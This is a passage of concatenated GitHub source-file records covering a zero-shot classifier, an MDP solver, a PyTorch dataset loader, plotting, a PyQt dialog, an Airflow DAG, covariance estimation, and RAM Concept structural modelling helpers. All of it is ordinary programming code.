Gallery/tensorflow/myrun.py","file_name":"myrun.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20571495887","text":"from app.core.model import register_model\nfrom app.core.pipeline import PipelineModel\n\n\n@register_model(\"zeroshot_classifier_model\")\nclass ZeroShotClassifierModel(PipelineModel):\n pipeline_name = \"zeroshot\"\n\n def _pre_process(self, payload):\n # See\n # https://huggingface.co/transformers/main_classes/pipelines.html#zeroshotclassificationpipeline\n return {\n \"params\": {\n \"pipeline_params\": {\n \"sequences\": payload.text,\n \"candidate_labels\": payload.candidate_labels,\n }\n }\n }\n\n def _post_process(self, result):\n prediction = result[\"result\"]\n # {'labels': ['technology', 'politics', 'sports'],\n # 'scores': [0.9663877487182617, 0.017997432500123978,\n # 0.015614871867001057],\n # 'sequence': 'Apple just announced the newest iPhone X'}\n\n threshold = self.pipeline_config.get(\"threshold\", 0.5)\n\n scores = dict(zip(prediction[\"labels\"], prediction[\"scores\"]))\n result = []\n for label, score in scores.items():\n if score > threshold:\n result.append({\"label\": label, \"score\": score})\n\n return {\"labels\": list(sorted(result, key=lambda x: x[\"score\"]))}\n","repo_name":"eea/nlp-service","sub_path":"app/api/zeroshot/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"27105500432","text":"#!/bin/python3\n# CS434 - HW5 \n# Sam Jacobs, Erich Kramer, Markus Woltjer\n#\n#\nimport sys\nimport os.path\nimport numpy as np\nfrom markov import *\n# Build a planner. Value iteration algorithm\n\n#input - MDP and factor discount B, output optimal utility function and policyP for mdp \n#and discount factor\n\n\n#2 Test on provided data with different B values\n\n#ouptut should consist of B, nx1 U and nx1 P\n\n\ndef cmdArgs():\n if len(sys.argv) != 3 :\n print(\"Usage: ./hw5 [filename] [discount factor [0,1]]\")\n exit() \n elif not os.path.exists(sys.argv[1]):\n print(\"Bad filename!\")\n exit()\n else:\n try:\n x = float(sys.argv[2])\n if( x < 0 or x > 1):\n raise ValueError\n except ValueError as error:\n print(\"Bad Discount factor! Must be float between 0 and 1\")\n\n exit()\n return;\n\n#assumes input file is filled with action by state tables for each state\n#readlines probably better than readline() for refactor\ndef getMark(numStates, numActions, fd):\n \n tmp = []\n for x in range(0, numActions):\n tmp.append([])\n fd.readline()\n for y in range(0, numStates):\n tmp[x].append([ float(val) for val in fd.readline().rstrip('\\n').rsplit(' ')])\n #Note: THIS ACCEPTS ONLY *THREE SPACES* DELIMITER. \n #list is currently [action0 [state0 ... stateN] , ... , actionN [state0 ... stateN] ]\n fd.readline()\n rewards = [float(x) for x in fd.readline().rstrip('\\n').rsplit(' ')]\n #swizzel\n states = []\n for i in range(0, numStates):\n stateProb = [ x[i] for x in tmp ]\n states.append( stateProb)\n\n\n m = Markov(states, rewards)\n return m\n\n#unicode characters <3\ndef δ(beta):\n epsilon = 10**-10\n numerator = epsilon*((1-beta)**2)\n denominator = 2 * (beta**2)\n return numerator / denominator\n\n\n\ndef main():\n cmdArgs()\n β = float(sys.argv[2])\n delta = δ(β)\n\n f = open(sys.argv[1], 'r')\n (statCnt, actCnt) = [ int(x) for x in f.readline().rstrip('\\n').rsplit(' ') ]\n\n markov = getMark(statCnt,actCnt, f)\n markov.Bellman( β, delta)\n markov.displayOutput()\n\n f.close()\n return;\n\n\n\nmain()\n\n","repo_name":"markuswoltjer/CS434","sub_path":"HW5/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39812987875","text":"import cv2\nfrom torch.utils import data\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport os\nfrom transforms import Transforms\nimport glob\nfrom torchvision.transforms import functional\nimport pandas as pd\nimport json\n\nclass Dataset(data.Dataset):\n def __init__(self, dataset, increntmal_phase,exemplar_set,exemplar_set_gt):\n self.dataset = dataset\n self.label_list=[]\n self.image_list=[]\n self.target=[]\n train_stage=['part_A_final','jujubes','cherrys','tulips','chickens','vehicles']\n test_stage={\n 0: ['part_A_final'],\n 1: ['jujubes','part_A_final'],\n 2: ['cherrys', 'part_A_final','jujubes'],\n 3: ['tulips', 'part_A_final', 'jujubes','cherrys'],\n 4: ['chickens', 'part_A_final', 'jujubes', 'cherrys','tulips'],\n 5: ['vehicles', 'part_A_final', 'jujubes', 'cherrys', 'tulips', 'chickens'],\n }\n self.class_name=['others','IMG','jujube','cherry','tulip','chicken','vehicle']\n\n dataset = dataset + '_data'\n if increntmal_phase==0:\n dataset_path = os.path.join('./dataset',train_stage[increntmal_phase],dataset,'images')\n self.image_list = glob.glob(os.path.join(dataset_path, '*.jpg'))\n for index in range(len(self.image_list)):\n image = self.image_list[index]\n image_name=image.split('images/')[1]\n if image_name.startswith('IMG'):\n self.label_list.append(self.image_list[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n if self.dataset=='train':\n self.target.append(1)\n else:\n img = cv2.imread(image)\n height = img.shape[0]\n width = img.shape[1]\n label=np.zeros((height,width))\n self.label_list.append(label)\n self.target.append(0)\n\n elif increntmal_phase>=1:\n if self.dataset=='test' or self.dataset=='val':\n for phase in range(len(test_stage[increntmal_phase])):\n dataset_path=os.path.join('./dataset',test_stage[increntmal_phase][phase],dataset,'images')\n img_list_buff=glob.glob(os.path.join(dataset_path,'*.jpg'))\n for index in range(len(img_list_buff)):\n self.image_list.append(img_list_buff[index])\n self.label_list.append(img_list_buff[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n # image_name = img_list_buff[index].split('images/')[1]\n # image_name = image_name.split('_')[0]\n # if image_name in self.class_name:\n # self.target.append(self.class_name.index(image_name))\n # else:\n # print('error!')\n\n elif self.dataset=='train':\n dataset_path = os.path.join('./dataset',train_stage[increntmal_phase], dataset, 'images')\n img_list_buff = glob.glob(os.path.join(dataset_path, '*.jpg'))\n for index in range(len(img_list_buff)):\n self.image_list.append(img_list_buff[index])\n self.label_list.append(img_list_buff[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n image_name = img_list_buff[index].split('images/')[1]\n image_name = image_name.split('_')[0]\n if image_name in self.class_name:\n self.target.append(self.class_name.index(image_name))\n else:\n print('error!')\n\n if exemplar_set!=None:\n for index in range(len(exemplar_set)):\n for num in range(len(exemplar_set[index])):\n self.image_list.append(exemplar_set[index][num])\n self.label_list.append(exemplar_set_gt[index][num])\n image_name = exemplar_set[index][num].split('images/')[1]\n image_name = image_name.split('_')[0]\n if image_name in self.class_name:\n self.target.append(self.class_name.index(image_name))\n else:\n self.target.append(0)\n\n def __getitem__(self, index):\n #class_name = ['others', 'IMG', 'jujube', 'cherry']\n image = Image.open(self.image_list[index]).convert('RGB')\n # target = self.target[index]\n if self.dataset == 'train':\n target = self.target[index]\n img=self.image_list[index].split('images/')[1]\n img = img.split('_')[0]\n #if img.startswith('IMG') or img.startswith('jujube') or img.startswith('cherry'):\n if img in self.class_name:\n label = pd.read_csv((self.label_list[index]), sep=',',header=None).values\n else:\n label = self.label_list[index]\n else:\n label = pd.read_csv((self.label_list[index]), sep=',',header=None).values\n\n density = np.asarray(label,np.float32)\n attention = np.zeros(density.shape)\n attention[density > 0.0001] = 1\n attention = attention.astype(np.float32, copy=False)\n gt = np.array(np.sum(np.sum(density)))\n\n trans = Transforms((0.8, 1.2), (400, 400), 1, (0.5, 1.5), self.dataset)\n if self.dataset=='train':\n image, density, attention = trans(image, density,attention)\n return image, density, target, attention\n\n else:\n height, width = image.size[1], image.size[0]\n height = round(height / 16) * 16\n width = round(width / 16) * 16\n image = image.resize((width, height), Image.BILINEAR)\n\n image = functional.to_tensor(image)\n image = functional.normalize(image, [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n return image, gt\n\n def __len__(self):\n return len(self.image_list)\n\n\n# if __name__ == '__main__':\n# train_dataset = Dataset1('/home/shengqin/wq/incremental_learning/iCaRL-master(modify)/dataset', 'train')\n# train_loader = data.DataLoader(train_dataset, batch_size=1, shuffle=True)\n#\n# for image, label, att in train_loader:\n# print(image.size())\n# print(label.size())\n# print(att.size())\n#\n# img = np.transpose(image.numpy().squeeze(), [1, 2, 0]) * 0.2 + 0.45\n# plt.figure()\n# plt.subplot(1, 3, 1)\n# plt.imshow(img)\n# plt.subplot(1, 3, 2)\n# plt.imshow(label.squeeze(), cmap='jet')\n# plt.subplot(1, 3, 3)\n# plt.imshow(att.squeeze(), cmap='jet')\n# plt.show()\n#","repo_name":"Tanyjiang/EOCO","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18076695733","text":"# importing the required module \nimport matplotlib.pyplot as plt\n\ndef process_file(fp):\n\tx_values = []\n\ty_values = []\n\tlines = fp.readlines()\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tobj = line.split(' - ')\n\t\tif not obj[0].isdigit():\n\t\t\tcontinue\n\t\tx_values.append(int(obj[0]) * 3)\n\t\ty_values.append(int(obj[1]))\n\n\treturn x_values, y_values\n\n \ndef main():\n\tfp1 = open('LockBasedResults.txt', 'r')\n\tfp2 = open('LockFreeResults.txt', 'r')\n\n\tg1_x, g1_y = process_file(fp1)\n\tg2_x, g2_y = process_file(fp2)\n\t\n\t# plotting the LockBasedResults Graph\n\tplt.plot(g1_x, g1_y, label = 'Lock Based')\n\n\t# plotting the LockFreeResults Graph\n\tplt.plot(g2_x, g2_y, label = 'Lock Free')\n\t \n\t# naming the x axis \n\tplt.xlabel('Num of Ops') \n\t# naming the y axis \n\tplt.ylabel('Time (ms)') \n\t \n\t# giving a title to my graph \n\tplt.title('Comparision of Throughput') \n\n\t# Showing the legend\n\tplt.legend(loc='upper left')\n\t \n\t# function to show the plot \n\tplt.show()\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"Bhargavasomu/Concurrent-Binary-Search-Tree","sub_path":"graph_gen.py","file_name":"graph_gen.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23905659348","text":"from __future__ import unicode_literals\n\nfrom PyQt5.QtCore import pyqtSlot, Qt, QSortFilterProxyModel, QStringListModel\nfrom PyQt5.QtWidgets import QDialog, QInputDialog, QLineEdit\n\nfrom .Ui_E5ErrorMessageFilterDialog import Ui_E5ErrorMessageFilterDialog\n\n\nclass E5ErrorMessageFilterDialog(QDialog, Ui_E5ErrorMessageFilterDialog):\n \"\"\"\n Class implementing a dialog to manage the list of messages to be ignored.\n \"\"\"\n def __init__(self, messageFilters, parent=None):\n \"\"\"\n Constructor\n \n @param messageFilters list of message filters to be edited\n (list of strings)\n @param parent reference to the parent widget (QWidget)\n \"\"\"\n super(E5ErrorMessageFilterDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.__model = QStringListModel(messageFilters, self)\n self.__model.sort(0)\n self.__proxyModel = QSortFilterProxyModel(self)\n self.__proxyModel.setFilterCaseSensitivity(Qt.CaseInsensitive)\n self.__proxyModel.setSourceModel(self.__model)\n self.filterList.setModel(self.__proxyModel)\n \n self.searchEdit.textChanged.connect(\n self.__proxyModel.setFilterFixedString)\n \n self.removeButton.clicked.connect(self.filterList.removeSelected)\n self.removeAllButton.clicked.connect(self.filterList.removeAll)\n \n @pyqtSlot()\n def on_addButton_clicked(self):\n \"\"\"\n Private slot to add an entry to the list.\n \"\"\"\n filter, ok = QInputDialog.getText(\n self,\n self.tr(\"Error Messages Filter\"),\n self.tr(\"Enter message filter to add to the list:\"),\n QLineEdit.Normal)\n if ok and filter != \"\" and filter not in self.__model.stringList():\n self.__model.insertRow(self.__model.rowCount())\n self.__model.setData(\n self.__model.index(self.__model.rowCount() - 1), filter)\n self.__model.sort(0)\n \n def getFilters(self):\n \"\"\"\n Public method to get the list of message filters.\n \n @return error message filters (list of strings)\n \"\"\"\n return self.__model.stringList()[:]\n","repo_name":"testmana2/eric","sub_path":"E5Gui/E5ErrorMessageFilterDialog.py","file_name":"E5ErrorMessageFilterDialog.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40911487037","text":"from src.sizing.BodyMeasurements import BodyMeasurements\n\n# Measurements for Velvet Caveat\n\nvelvet_caveat = BodyMeasurements(\n chest=400,\n bust=950,\n front_shoulder_to_waist=480,\n waist=790,\n neck_size=390,\n nape_to_waist=450,\n bust_to_waist=240,\n under_bust=87,\n shoulders=480,\n)\n\nprint(velvet_caveat)\n\n\n# More measuruments from 23.01.2023\n# Neck to shoulder: 7”/18cm\n# Bust: 39”/99cm\n# Chest: 14”/36.5cm\n# Nape to waist: 17”/44cm\n# Back: 14.5”/37.5cm\n","repo_name":"joelle-o-world/pattern-cutting","sub_path":"velvet-caveat.py","file_name":"velvet-caveat.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14983744492","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2017, 8, 31),\n 'email': ['airflow@airflow.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = DAG('airflow-docker-example', default_args=default_args)\n\nt1 = BashOperator(\n task_id='print_date',\n bash_command='date',\n dag=dag)\n\nt2 = BashOperator(\n task_id='hello_world',\n bash_command='echo Hello World',\n dag=dag)\n\nt2.set_upstream(t1)\n","repo_name":"Shinichi-Nakagawa/airflow-docker","sub_path":"airflow_dag_sample/hello_airflow.py","file_name":"hello_airflow.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"39116853532","text":"\"\"\"\nmain.py\n\nThis is where model training is done. Note that train_model() in utilities.py is where our main\ntraining function is defined.\n\"\"\"\nfrom unicodedata import category\nimport torch\nimport pickle\n\nfrom utilities import train_model, get_param_sizes, generate_hyperparameters, \\\n find_best_parameters, find_correct_classifications\nfrom model import DBPedia, HierarchicalRNN, BaselineMLP\n\n\nif __name__ == \"__main__\":\n file_fmt = \"processed_data/DBPEDIA_{split}_{var}.pt\"\n small_file_fmt = \"processed_data/DBPEDIA_{split}_small_{var}.pt\"\n l2_l1_file_fmt = \"processed_data/DBPEDIA_l2_l1_Agent_{var}.pt\"\n\n # how much data to load\n train_obs = 40000\n val_obs = 36003\n test_obs = 60794\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print(\"Using device {}\".format(device))\n\n # Uncomment train based on what training set you want to use\n\n # train = DBPedia(small_file_fmt.format(split=\"train\", var=\"embeddings\", category=\"l2\"),\n # small_file_fmt.format(split=\"train\", var=\"labels\", category=\"l2\"),\n # obs=train_obs)\n\n # train = DBPedia(l2_l1_file_fmt.format(var=\"embeddings\"),\n # l2_l1_file_fmt.format(var=\"labels\"),\n # obs=train_obs)\n\n train = DBPedia(file_fmt.format(split=\"train\", var=\"embeddings\"),\n file_fmt.format(split=\"train\", var=\"labels\"),\n obs=train_obs)\n val = DBPedia(file_fmt.format(split=\"val\", var=\"embeddings\"),\n file_fmt.format(split=\"val\", var=\"labels\"),\n obs=val_obs)\n test = DBPedia(file_fmt.format(split=\"test\", var=\"embeddings\"),\n file_fmt.format(split=\"test\", var=\"labels\"),\n obs=test_obs)\n\n # uncomment model to use\n\n model = HierarchicalRNN(\n input_size=768, emb_size=100, output_sizes=(9, 70, 219)\n ).to(device)\n\n # model = BaselineMLP(\n # input_size=768, output_sizes=(9, 70, 219)\n # ).to(device)\n\n '''\n Model Checkpointing Notes\n \n For checkpointing/saving a model, set checkpoint_path to the directory for \n model checkpoint to be saved i.e. \"./checkpoint/\".\n\n To load a checkpointed model and train on it set: load_checkpoint: True and \n load_checkpoint_path = ex. \"./checkpoint/model_233939_0\"\n\n You can also set the checkpoint frequency by setting checkpoint_frequency = \n By default it is set to 4 epochs.\n\n Model checkpoints will be saved in a directory within your checkpoint path\n '''\n train_opts = {\n \"calc_acc_every\": 4,\n \"num_epochs\": 100,\n \"checkpoint_path\": './checkpoints/',\n # \"load_checkpoint\": True,\n # \"load_checkpoint_path\": './checkpoints/18-04-2022 11:19:48/model_18-04-2022 11:19:48_20',\n \"optimizer\": \"adam\",\n \"tf_init\": 0,\n \"tf_decay\": 0.5\n }\n\n # param_sizes = get_param_sizes(model)\n\n '''\n Toggle save_imgs to True to save imgs to an imgs directory which will be created if it doesn't exist: imgs/\n '''\n # hp = find_best_parameters(20, model, train, val, test, device)\n ho = {'calc_acc_every': 4, 'batch_size': 64, 'learning_rate': 0.001020977066089074,\n 'weight_decay': 0.000, 'momentum': 0.000, 'num_epochs': 14}\n train_opts.update(ho)\n\n # train_model(model, train, val, test,\n # device=device, train_opts=train_opts, show_plts=False, save_imgs=False)\n\n # needed to load pickle file.\n\n # from data_cleaning import WordIdMapping\n # options = {\n # 'load_checkpoint': True,\n # 'load_checkpoint_path': \"./checkpoints/18-04-2022 16:20:40/model_18-04-2022 16:20:40_14\"\n # }\n # data_mapping = pickle.load(open('./processed_data/mapping.pkl', 'rb'))\n # res = find_correct_classifications(model, opts=options, device=device, word_mapping=data_mapping)\n # print(res)\n","repo_name":"keithallatt/HierarchicalMultiLabelClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8331775308","text":"from __future__ import annotations\n\nfrom collections import namedtuple\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nfrom pandas._typing import TimedeltaConvertibleTypes\nfrom scipy.sparse.linalg import eigsh\nfrom scipy.sparse.linalg import LinearOperator\n\nfrom cvx.covariance.ewma import center\nfrom cvx.covariance.ewma import clip\nfrom cvx.covariance.ewma import volatility\n\nLowRankCovariance = namedtuple(\"LowRankCovariance\", [\"F\", \"d\"])\nIEWMA = namedtuple(\"IEWMA\", [\"time\", \"mean\", \"covariance\", \"volatility\"])\n\n\ndef _get_diagonal(F, d):\n return np.sum(F**2, axis=1) + d\n\n\ndef low_rank_iterated_ewma(\n returns,\n vola_halflife,\n cov_halflife,\n rank,\n min_periods_vola=20,\n min_periods_cov=20,\n mean=False,\n mu_halflife1=None,\n mu_halflife2=None,\n clip_at=None,\n):\n mu_halflife1 = mu_halflife1 or vola_halflife\n mu_halflife2 = mu_halflife2 or cov_halflife\n\n def scale_low_rank(vola, low_rank):\n F_temp = low_rank.F\n d_temp = low_rank.d\n\n index = F_temp.index\n columns = F_temp.columns\n F_temp = F_temp.values\n d_temp = d_temp.values\n\n # Convert (covariance) matrix to correlation matrix\n v = 1 / np.sqrt(_get_diagonal(F_temp, d_temp).reshape(-1, 1))\n F = v * F_temp\n d = (v.flatten() ** 2) * d_temp\n\n F = vola.reshape(-1, 1) * F\n d = (vola**2) * d\n\n return LowRankCovariance(\n F=pd.DataFrame(F, index=index, columns=columns), d=pd.Series(d, index=index)\n )\n\n def scale_mean(vola, vec1, vec2):\n return vec1 + vola * vec2\n\n # compute the moving mean of the returns\n\n # TODO: Check if this is correct half life\n returns, returns_mean = center(\n returns=returns, halflife=mu_halflife1, min_periods=0, mean_adj=mean\n )\n\n # estimate the volatility, clip some returns before they enter the estimation\n vola = volatility(\n returns=returns,\n halflife=vola_halflife,\n min_periods=min_periods_vola,\n clip_at=clip_at,\n )\n\n # adj the returns\n adj = clip((returns / vola), clip_at=clip_at)\n\n # center the adj returns again? Yes, I think so\n # TODO: Check if this is correct half life\n\n adj, adj_mean = center(adj, halflife=mu_halflife2, min_periods=0, mean_adj=mean)\n # if mean:\n # print(adj)\n # print(adj_mean)\n # assert False\n\n m = pd.Series(np.zeros_like(returns.shape[1]), index=returns.columns)\n\n for t, low_rank in _ewma_low_rank(\n data=adj, halflife=cov_halflife, min_periods=min_periods_cov, rank=rank\n ):\n if mean:\n m = scale_mean(\n vola=vola.loc[t].values, vec1=returns_mean.loc[t], vec2=adj_mean.loc[t]\n )\n\n yield IEWMA(\n time=t,\n mean=m,\n covariance=scale_low_rank(vola=vola.loc[t].values, low_rank=low_rank),\n volatility=vola.loc[t],\n )\n\n\ndef _ewma_low_rank(data, halflife, min_periods=0, rank=5):\n \"\"\"\n param data: Txn pandas DataFrame of returns\n param halflife: float, halflife of the EWMA\n \"\"\"\n for t, low_rank_covariance in _general_low_rank(\n data.values,\n times=data.index,\n halflife=halflife,\n min_periods=min_periods,\n rank=rank,\n ):\n F_t = low_rank_covariance.F\n d_t = low_rank_covariance.d\n if not np.isnan(F_t).all():\n yield t, LowRankCovariance(\n pd.DataFrame(\n index=data.columns, columns=np.arange(F_t.shape[1]), data=F_t\n ),\n pd.Series(index=data.columns, data=d_t),\n )\n\n\ndef _low_rank_sum(F, d, r):\n r\"\"\"\n D = diag(d)\n\n Approximates sum FF^T + D + rr^T as low rank plus diagonal matrix:\n \\hat{F}\\hat{F}^T + \\hat{D}\n\n returns \\hat{F}, diag(\\hat{D})\n \"\"\"\n n = F.shape[0]\n rank = F.shape[1]\n r = r.reshape(-1, 1)\n d = d.reshape(-1, 1)\n\n def _mv(x):\n \"\"\" \"\n returns (FF^T + D + rr^T)x\n \"\"\"\n shape = x.shape\n x = x.reshape(-1, 1)\n\n return (\n ((scale * F) @ ((F.T * scale.T) @ x)) + (scale * r) * (r.T * scale.T) @ x\n ).reshape(shape)\n\n def _get_new_diag(F_hat):\n r\"\"\"\n returns diag(\\hat{D})\n \"\"\"\n\n return (\n np.ones((n, 1))\n + d * (scale**2)\n - np.sum(F_hat**2, axis=1).reshape(-1, 1)\n )\n\n # Get scaling toward correlation matrix\n scale = 1 / np.sqrt(np.sum(F**2, axis=1).reshape(-1, 1) + r**2)\n\n A = LinearOperator((n, n), matvec=_mv)\n\n # Compute top eigenvalues\n lamda, Q = eigsh(A, k=rank, which=\"LM\")\n\n # Replace negative lamda with 0\n lamda[lamda < 0] = 0\n\n # Get new low rank component (unscaled)\n F_hat_temp = Q * np.sqrt(lamda).reshape(1, -1)\n\n # Get new diagonal\n d_hat = 1 / (scale) * _get_new_diag(F_hat_temp) * 1 / (scale)\n\n # Scale back low rank component\n F_hat = (1 / scale) * F_hat_temp\n\n # Replace negative d_hat with 0\n d_hat[d_hat < 0] = 0\n\n return LowRankCovariance(F_hat, d_hat.flatten())\n\n\ndef _general_low_rank(\n y,\n times,\n halflife: float | TimedeltaConvertibleTypes | None = None,\n alpha: float | None = None,\n rank=5,\n min_periods=0,\n):\n \"\"\"\n y: frame with measurements for times t=t_1,t_2,...,T\n halflife: EWMA half life\n\n returns: list of EWMAs for times t=t_1,t_2,...,T\n serving as predictions for the following timestamp\n\n The function returns a generator over\n t_i, EWMA of fct(y_i)\n \"\"\"\n n = y.shape[1]\n\n def f(k):\n if k < min_periods - 1:\n return times[k], LowRankCovariance(\n np.nan * _low_rank.F, np.nan * _low_rank.d\n )\n\n return times[k], LowRankCovariance(_low_rank.F, _low_rank.d)\n\n if halflife:\n alpha = 1 - np.exp(-np.log(2) / halflife)\n\n beta = 1 - alpha\n\n # first row, important to initialize the _ewma variable\n F_init = np.zeros((n, rank))\n F_init[:, 0] = y[0]\n d_init = np.zeros(n)\n _low_rank = LowRankCovariance(F_init, d_init)\n yield f(k=0)\n\n # iterate through all the remaining rows of y. Start in the 2nd row\n for n, row in enumerate(y[1:], start=1):\n coef_old = (beta - beta ** (n + 1)) / (1 - beta ** (n + 1))\n coef_new = (1 - beta) / (1 - beta ** (n + 1))\n\n F_scaled = _low_rank.F * np.sqrt(coef_old)\n d_scaled = _low_rank.d * coef_old\n r_scaled = row * np.sqrt(coef_new)\n\n _low_rank = _low_rank_sum(F_scaled, d_scaled, r_scaled)\n\n yield f(k=n)\n","repo_name":"cvxgrp/cov_pred_finance","sub_path":"experiments/utils/low_rank_ewma.py","file_name":"low_rank_ewma.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"3"} +{"seq_id":"34202839635","text":"from typing import Union\nfrom ram_concept.model import Model\nfrom ram_concept.structure_layer import StructureLayer\nfrom ram_concept.point_2D import Point2D\nfrom ram_concept.line_segment_2D import LineSegment2D\nfrom ram_concept.polygon_2D import Polygon2D\nfrom ram_concept.slab_area import SlabAreaBehavior\nfrom ram_concept.beam import BeamBehavior\n\n\ndef add_slab_area(model: Model, polygon: Polygon2D, name: Union[str, None], thickness: Union[float, None],\n top_of_concrete: Union[float, None], priority: Union[int, None], behaviour: Union[str, None],\n material: Union[str, None], axis_angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add slab area\n slab_area = structure_layer.add_slab_area(polygon)\n # set properties of slab area\n if name is not None:\n slab_area.name = name\n if thickness is not None:\n slab_area.thickness = thickness\n if top_of_concrete is not None:\n slab_area.toc = top_of_concrete\n if priority is not None:\n slab_area.priority = priority\n if behaviour is not None:\n slab_area.behavior = SlabAreaBehavior(behaviour)\n if material is not None:\n slab_area.concrete = model.concretes.concrete(material)\n if axis_angle is not None:\n slab_area.r_axis = axis_angle\n # TODO add stiffness modifiers for custom slab areas\n\n\ndef add_slab_opening(model: Model, polygon: Polygon2D, name: Union[str, None], priority: Union[int, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add slab opening\n slab_opening = structure_layer.add_slab_opening(polygon)\n # set properties of slab opening\n if name is not None:\n slab_opening.name = name\n if priority is not None:\n slab_opening.priority = priority\n\n\ndef add_column(model: Model, location: Point2D, name: Union[str, None], below_slab: Union[bool, None],\n height: Union[float, None], compressible: Union[bool, None], fixed_near: Union[bool, None],\n fixed_far: Union[bool, None], roller: Union[bool, None], material: Union[str, None],\n i_factor: Union[float, None], depth: Union[float, None], breadth: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add column\n column = structure_layer.add_column(location)\n # set properties of column\n if name is not None:\n column.name = name\n if below_slab is not None:\n column.below_slab = below_slab\n if height is not None:\n column.height = height\n if compressible is not None:\n column.compressible = compressible\n if fixed_near is not None:\n column.fixed_near = fixed_near\n if fixed_far is not None:\n column.fixed_far = fixed_far\n if roller is not None:\n column.roller = roller\n if material is not None:\n column.concrete = model.concretes.concrete(material)\n if i_factor is not None:\n column.i_factor = i_factor\n if depth is not None:\n column.d = depth\n if breadth is not None:\n column.b = breadth\n if angle is not None:\n column.angle = angle\n\n\ndef add_wall(model: Model, line_segments: list[LineSegment2D], name: Union[str, None], below_slab: Union[bool, None],\n height: Union[float, None], compressible: Union[bool, None], fixed_near: Union[bool, None],\n fixed_far: Union[bool, None], shear_wall: Union[bool, None], material: Union[str, None],\n thickness: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add wall segments\n for segment in line_segments:\n wall = structure_layer.add_wall(segment)\n # set properties of wall\n if name is not None:\n wall.name = name\n if below_slab is not None:\n wall.below_slab = below_slab\n if height is not None:\n wall.height = height\n if compressible is not None:\n wall.compressible = compressible\n if fixed_near is not None:\n wall.fixed_near = fixed_near\n if fixed_far is not None:\n wall.fixed_far = fixed_far\n if shear_wall is not None:\n wall.shear_wall = shear_wall\n if material is not None:\n wall.concrete = model.concretes.concrete(material)\n if thickness is not None:\n wall.thickness = thickness\n\n\ndef add_beam(model: Model, line_segments: list[LineSegment2D], name: Union[str, None], thickness: Union[float, None],\n width: Union[float, None], top_of_concrete: Union[float, None], priority: Union[int, None],\n behaviour: Union[str, None], material: Union[str, None], mesh_as_slab: Union[bool, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add beam segments\n for segment in line_segments:\n beam = structure_layer.add_beam(segment)\n # set properties of beam\n if name is not None:\n beam.name = name\n if thickness is not None:\n beam.thickness = thickness\n if width is not None:\n beam.width = width\n if top_of_concrete is not None:\n beam.toc = top_of_concrete\n if priority is not None:\n beam.priority = priority\n if behaviour is not None:\n beam.behavior = BeamBehavior(behaviour)\n if material is not None:\n beam.concrete = model.concretes.concrete(material)\n if mesh_as_slab is not None:\n beam.mesh_as_slab = mesh_as_slab\n # TODO add stiffness modifiers for custom beams\n\n\ndef add_point_support(model: Model, location: Point2D, name: Union[str, None], elevation: Union[float, None],\n Fr: Union[bool, None], Fs: Union[bool, None], Fz: Union[bool, None],\n Mr: Union[bool, None], Ms: Union[bool, None], angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add point support\n support = structure_layer.add_point_support(location)\n # set properties of point support\n if name is not None:\n support.name = name\n if elevation is not None:\n support.elevation = elevation\n if Fr is not None:\n support.Fr = Fr\n if Fs is not None:\n support.Fs = Fs\n if Fz is not None:\n support.Fz = Fz\n if Mr is not None:\n support.Mr = Mr\n if Ms is not None:\n support.Ms = Ms\n if angle is not None:\n support.angle = angle\n\n\ndef add_point_spring(model: Model, location: Point2D, name: Union[str, None], elevation: Union[float, None],\n kFr: Union[float, None], kFs: Union[float, None], kFz: Union[float, None],\n kMr: Union[float, None], kMs: Union[float, None], angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add point spring\n spring = structure_layer.add_point_spring(location)\n # set properties of point spring\n if name is not None:\n 